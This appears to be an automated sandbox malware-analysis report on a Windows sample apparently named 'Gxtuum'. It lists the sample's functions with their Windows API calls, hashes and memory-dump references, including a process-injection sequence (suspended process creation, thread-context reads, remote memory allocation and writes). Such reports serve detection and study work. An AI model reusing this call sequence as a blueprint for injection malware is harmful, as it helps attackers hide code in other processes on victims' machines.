GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000E94AB
GetProcAddress.KERNEL32(00000000), ref: 000E94B2
GetNativeSystemInfo.KERNELBASE(?), ref: 000E9573

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: AddressHandleInfoModuleNativeProcSystemVersion
String ID:
API String ID: 2167034304-0
Opcode ID: 939e8551a7bc6d3ac2973aa2b5b67158a0498415620d1ddf40ff8552bbfbc20f
Instruction ID: 98c040362c903f103613771e9fd88757afdde81d7e9e490fb51f78630a51472d
Opcode Fuzzy Hash: 939e8551a7bc6d3ac2973aa2b5b67158a0498415620d1ddf40ff8552bbfbc20f
Instruction Fuzzy Hash: 52C1F671E002449FDF14DF69CC89BADBBB5EF85310F548268E815EB2C6DB749A80CB91

Function 001011A0 Relevance: 6.0, APIs: 4, Instructions: 37
threadsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000EC6D0: Sleep.KERNELBASE(00000096), ref: 000EC6D6
Part of subcall function 000EC6D0: CreateMutexA.KERNELBASE(00000000,00000000,00147494), ref: 000EC6F4
Part of subcall function 000EC6D0: GetLastError.KERNEL32 ref: 000EC6FC
Part of subcall function 000EC6D0: GetLastError.KERNEL32 ref: 000EC70D

Part of subcall function 000FF750: RegOpenKeyExA.KERNELBASE(80000002,System,00000000,000F003F,?,00000000), ref: 000FF832
Part of subcall function 000FF750: RegCloseKey.KERNELBASE(80000002), ref: 000FF848

Part of subcall function 000E61F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 000E67BD
Part of subcall function 000E61F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 000E6894

CreateThread.KERNELBASE(00000000,00000000,Function_00020F90,00000000,00000000,00000000), ref: 00101166
CreateThread.KERNELBASE(00000000,00000000,Function_00021020,00000000,00000000,00000000), ref: 00101177
CreateThread.KERNELBASE(00000000,00000000,Function_000210B0,00000000,00000000,00000000), ref: 00101188
Sleep.KERNELBASE(00007530), ref: 00101195

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: Create$Thread$ErrorLastOpenSleep$CloseInfoMutexQuery
String ID:
API String ID: 2192108483-0
Opcode ID: 5c8b82c83f91aba404bc22da6582f29a9be4615ab6ee4521390e95646fc95cc5
Instruction ID: 2c0d961a3690f5c2fd73a51e9dd3294d9602dec9eede23f2dfedc44161cc19ed
Opcode Fuzzy Hash: 5c8b82c83f91aba404bc22da6582f29a9be4615ab6ee4521390e95646fc95cc5
Instruction Fuzzy Hash: A0F0E531BD835876F13437A51C07FEA29045B08F91F340112B7A97E5C65EC5358066AF

Function 000EC6D0 Relevance: 6.0, APIs: 4, Instructions: 36
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000096), ref: 000EC6D6
CreateMutexA.KERNELBASE(00000000,00000000,00147494), ref: 000EC6F4
GetLastError.KERNEL32 ref: 000EC6FC
GetLastError.KERNEL32 ref: 000EC70D

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: ErrorLast$CreateMutexSleep
String ID:
API String ID: 3645482037-0
Opcode ID: ade8812c763ef53770babd2f345cf17e479652776cd2ee90296060dacae73b93
Instruction ID: 84fd904e9746cb4e84e9811704acccccaa7ddad30e38ec759e342ff8f066e0c4
Opcode Fuzzy Hash: ade8812c763ef53770babd2f345cf17e479652776cd2ee90296060dacae73b93
Instruction Fuzzy Hash: 8FE0483410C240EFF7541B79ED4DB1E3A56E790721F680420F645D64F1C76148C18A11

Function 000EA470 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,455139FB,00000000,?), ref: 000EA4BA

Strings

0s==, xrefs: 000EA4C5

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: FolderPath
String ID: 0s==
API String ID: 1514166925-3042506011
Opcode ID: 46be83078c0a9907b4c3e06dcb7190dbc93fbc533ae69cc3ff2bb222fa2f09ec
Instruction ID: c2903e04dc10dcb04da9c4081a8713f529828ed11e695f568ed89eb754ba73c1
Opcode Fuzzy Hash: 46be83078c0a9907b4c3e06dcb7190dbc93fbc533ae69cc3ff2bb222fa2f09ec
Instruction Fuzzy Hash: CC412571A101589FDB28DB28CC46BEDBBB5EB4A710F5042D9E409A72C1DB756F80CF91

Function 000F1DD0 Relevance: 3.3, APIs: 2, Instructions: 315
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,00000000,?,7FFFFFFF,?,?,0013DC20,00000001), ref: 000F1F94
CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?), ref: 000F20B4

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: CreateDirectoryFileModuleName
String ID:
API String ID: 3341437400-0
Opcode ID: a4d636850c926f6e987e0249f1cc23f9315c95b7d149c2537295ec98519cff87
Instruction ID: a6d2f1ae0e8a368949cb79a838710c7423729df9703d6975d01bf40f9e60ce4a
Opcode Fuzzy Hash: a4d636850c926f6e987e0249f1cc23f9315c95b7d149c2537295ec98519cff87
Instruction Fuzzy Hash: A5C11171A002589BDF29EB28CC4ABEDBB75AF56300F8041D8E548A76D2DB715F84CF91

Function 00110A94 Relevance: 3.1, APIs: 2, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52d5ac9662920d089a2536f90c479d9828bd06572b232e6de9a852d2dffc9c50
Instruction ID: 843a9f2de8f4cbdd9387140b3a63e17f982b3129c42ff45b0996905064cca0e7
Opcode Fuzzy Hash: 52d5ac9662920d089a2536f90c479d9828bd06572b232e6de9a852d2dffc9c50
Instruction Fuzzy Hash: FF210631D04208BAEB16AB649C42FDE7729AF41378F240334F9642B1D1DBF15D82D665

Function 00110D6C Relevance: 3.1, APIs: 2, Instructions: 54timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(00000000,?,?,?,?,00110CA3,?,?,00000000,00000000), ref: 00110D9A
SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?,?,?,?,00110CA3,?,?,00000000,00000000), ref: 00110DAE

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: 9e18f7377159b01a24bebab31729e05c3406d37b36e63da22393c013a126acf1
Instruction ID: 01ce406d891a8509e28388aa0a6821a5d4a25ce2d58dd97c4a9fadad46b1ccbf
Opcode Fuzzy Hash: 9e18f7377159b01a24bebab31729e05c3406d37b36e63da22393c013a126acf1
Instruction Fuzzy Hash: 8C11E87690020CABCF15DFE4D985AEF77BDAB0C310F504266E516E2181EB70EA858BA1

Function 000EB250 Relevance: 1.7, APIs: 1, Instructions: 169COMMON

Download Yara Rule

APIs

GetComputerNameExW.KERNEL32(00000002,?,?,455139FB,74DF0F00), ref: 000EB2A6

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 45ff75b61d478f834eb44de400b13d2036cc1ca1dd8f71cade780d9073ce242b
Instruction ID: ec07a17044f580bde56ed1249f794732e115b1e73e525f42efd14c580bd3fbf0
Opcode Fuzzy Hash: 45ff75b61d478f834eb44de400b13d2036cc1ca1dd8f71cade780d9073ce242b
Instruction Fuzzy Hash: CD5190B19012699FCB20DF64DCC87DEB7B4AF58314F1002D9D819A7291DB74AB80CF91

Function 000EA270 Relevance: 1.6, APIs: 1, Instructions: 142COMMON

Download Yara Rule

APIs

GetTempPathA.KERNELBASE(00000104,?,455139FB,?,00000000), ref: 000EA2B7

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: PathTemp
String ID:
API String ID: 2920410445-0
Opcode ID: 01db97be6eef4df99130a7969ca84320415bf64564622e9e45a85fb3e5e562fa
Instruction ID: fadf7391cf46bd64dcc875a187f6dd0b832536481c68b3a987f6aa05157276ad
Opcode Fuzzy Hash: 01db97be6eef4df99130a7969ca84320415bf64564622e9e45a85fb3e5e562fa
Instruction Fuzzy Hash: 7851B471A001589FDB28DB28CD497DDB7B5EB8A300F4081D8E449A72C2DBB56F84CF91

Function 0011F01F Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 315a8745e3546c021b2108a0af610391cd5090da7c913afa99fd8668eaed7bf6
Instruction ID: 133dc872141d022beb8d60e7e819f298f6e2fae5511203ac6dc7aee4865eed86
Opcode Fuzzy Hash: 315a8745e3546c021b2108a0af610391cd5090da7c913afa99fd8668eaed7bf6
Instruction Fuzzy Hash: A32198B5C0031967CB24AB759C4ADDF7ABCDF51764F114279F864E3192EB30CE858A90

Function 001177A2 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 001177DC

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: af29e7063bd5b15ffc32cff9fb947787f1298b7cab85539733ea274abc060369
Instruction ID: e656698a11c7c8cd05837d37a9f580494f7d56244e6dfd39857d09c0be642de5
Opcode Fuzzy Hash: af29e7063bd5b15ffc32cff9fb947787f1298b7cab85539733ea274abc060369
Instruction Fuzzy Hash: 18113375A0420AAFCB09DF58E94199A7BF4EF48304B104069F808AB351D730EA11CBA4

Function 00110A22 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00110A89

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 5806a22f12cb4afe1abbd2cb36b595270268b3ae57944d2dda9f9ec6912ba8be
Instruction ID: 6fc03a1d700c949944672d3e95a643c3f40182a8fd9c468bb5fa155e312ad6e0
Opcode Fuzzy Hash: 5806a22f12cb4afe1abbd2cb36b595270268b3ae57944d2dda9f9ec6912ba8be
Instruction Fuzzy Hash: BA015E72D04209AEDF06ABA8A802BDD7BE5AF58310F144166F914E21D1EBB18AC0C790

Function 00123E01 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00123E64

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 5bf193fee8e13bd601411da2ac5b93692fa8ed646d5c05a249e26dc7ca1745e2
Instruction ID: f99d5acce00bc02b003660d0f9edb3a7efe5171e5140e2411232f5134946b35d
Opcode Fuzzy Hash: 5bf193fee8e13bd601411da2ac5b93692fa8ed646d5c05a249e26dc7ca1745e2
Instruction Fuzzy Hash: 18014F72C00159AFCF01AFA89C019EEBFF5BF58310F154565F924E21A1E7358B64DB91

Function 001187D5 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00100FD7,?,?,0010A1C2,00100FD7,?,001037BE,8B18EC84,74DF0F00), ref: 00118807

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4d782d0598515e826afb8d8e960d13afac739aefd6ad7ab81b5a6df101a934d4
Instruction ID: f862d0408f9849609a313e5a3eea4bfa8f23159689b61c621a421287b4a2ac3b
Opcode Fuzzy Hash: 4d782d0598515e826afb8d8e960d13afac739aefd6ad7ab81b5a6df101a934d4
Instruction Fuzzy Hash: 91E02232205220ABDA3C27B6AC00BDB7A49AF11BF0F658130FC18964D0CF65CCC182E6

Function 00123B48 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00123F38,?,?,00000000,?,00123F38,00000000,0000000C), ref: 00123B65

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 57df52ae38886957ef54720ec50450988ded0bb59db358c7a1bf7a4b65b28745
Instruction ID: 474692a30cdaaaa622155c592c2639e62ab2c25205be2cbb363ee607f52fed58
Opcode Fuzzy Hash: 57df52ae38886957ef54720ec50450988ded0bb59db358c7a1bf7a4b65b28745
Instruction Fuzzy Hash: 77D06C3200010DBFEF028F84DD06EDA3FAAFB48714F014000BA1856420C732E861AB90

Function 00101020 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 000E61F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,455139FB,455139FB), ref: 000E639C
Part of subcall function 000E61F0: RegQueryValueExA.KERNELBASE(455139FB,?,00000000,00000000,?,00000400,?,?,00000000,00000001,455139FB,455139FB), ref: 000E63CA
Part of subcall function 000E61F0: RegCloseKey.KERNELBASE(455139FB,?,?,00000000,00000001,455139FB,455139FB), ref: 000E63D6

Sleep.KERNELBASE ref: 001010A5

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: CloseOpenQuerySleepValue
String ID:
API String ID: 4119054056-0
Opcode ID: 17363584cb66698ed476c4892c4a370a26071ab77fcb55ba48e02e12812a5ec0
Instruction ID: c8b82ceebcd61ca51804324069085842c28cbcf60abdf6e4c922a4ac79885553
Opcode Fuzzy Hash: 17363584cb66698ed476c4892c4a370a26071ab77fcb55ba48e02e12812a5ec0
Instruction Fuzzy Hash: 17F0F4B5A00684ABC701BB6CDD0375EBBA9EB12B60F440398F8216B2E7DB711A0447D3

Function 00100F90 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 000E61F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,455139FB,455139FB), ref: 000E639C
Part of subcall function 000E61F0: RegQueryValueExA.KERNELBASE(455139FB,?,00000000,00000000,?,00000400,?,?,00000000,00000001,455139FB,455139FB), ref: 000E63CA
Part of subcall function 000E61F0: RegCloseKey.KERNELBASE(455139FB,?,?,00000000,00000001,455139FB,455139FB), ref: 000E63D6

Sleep.KERNELBASE ref: 00101015

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: CloseOpenQuerySleepValue
String ID:
API String ID: 4119054056-0
Opcode ID: 92df1e532d06f680abefd10a2675b95587c509eaedac13c5f8e7ccfeb0b36967
Instruction ID: 9597dec25c6ed8cec399f77afcac134df304213a6b639ab5b1359768829eeef0
Opcode Fuzzy Hash: 92df1e532d06f680abefd10a2675b95587c509eaedac13c5f8e7ccfeb0b36967
Instruction Fuzzy Hash: C4F0D1B5A00244ABC601BB68DD03A5E7A69AB16B20F440398E821672E2DB711A0447D3

Non-executed Functions

Function 000E8070 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 121memoryprocessthreadCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 000E809D
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 000E80FB
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 000E8114
GetThreadContext.KERNEL32(?,00000000), ref: 000E8129
ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 000E8149
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 000E818B
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 000E81A8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 000E8261

Strings

invalid stoi argument, xrefs: 000E8057
VUUU, xrefs: 000E7F01
, xrefs: 000E8140

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
String ID: $VUUU$invalid stoi argument
API String ID: 3796053839-3954507777
Opcode ID: 271e40cef0d32a039f90b7421aed50d83cadabdf5e6d6cee17ca78cbbde8e947
Instruction ID: 3bcdc2808f5afaff9d46d60c7d64e03b759be57777b776006b3a493180bff5aa
Opcode Fuzzy Hash: 271e40cef0d32a039f90b7421aed50d83cadabdf5e6d6cee17ca78cbbde8e947
Instruction Fuzzy Hash: C6417F70644341BFD7609F61DC06F96BBE8FF88B01F004419B788E65E0DBB0A994CB96

Function 00122516 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001171C0: GetLastError.KERNEL32(00000000,00000000,?,00117FA7,?,00000000,00000000,?,00118461,00000000,00000000,00000000,00000000,8B18EC83,00144218,00000010), ref: 001171C5
Part of subcall function 001171C0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00118461,00000000,00000000,00000000,00000000,8B18EC83,00144218,00000010,00111502,00000000,00000000,00000000), ref: 00117263

GetACP.KERNEL32(?,?,?,?,?,?,001155C7,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 001225D7
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,001155C7,?,?,?,00000055,?,-00000050,?,?), ref: 00122602
_wcschr.LIBVCRUNTIME ref: 00122696
_wcschr.LIBVCRUNTIME ref: 001226A4
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00122765

Strings

utf8, xrefs: 001226D4

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8
API String ID: 4147378913-905460609
Opcode ID: aa5070fd851dbc8cf2943d7bf63506050c75e2074f9d461db8f0cbe87265a34d
Instruction ID: dba1e704da6a3f5f61790519af14a9ef81d5149eb122722f6349862a079a1af1
Opcode Fuzzy Hash: aa5070fd851dbc8cf2943d7bf63506050c75e2074f9d461db8f0cbe87265a34d
Instruction Fuzzy Hash: E071E572600322BBDB29AB75EC46FAF73A8EF64700F154029F905D7181FBB4E9618761

Function 00122CA2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00122FC0,00000002,00000000,?,?,?,00122FC0,?,00000000), ref: 00122D3B
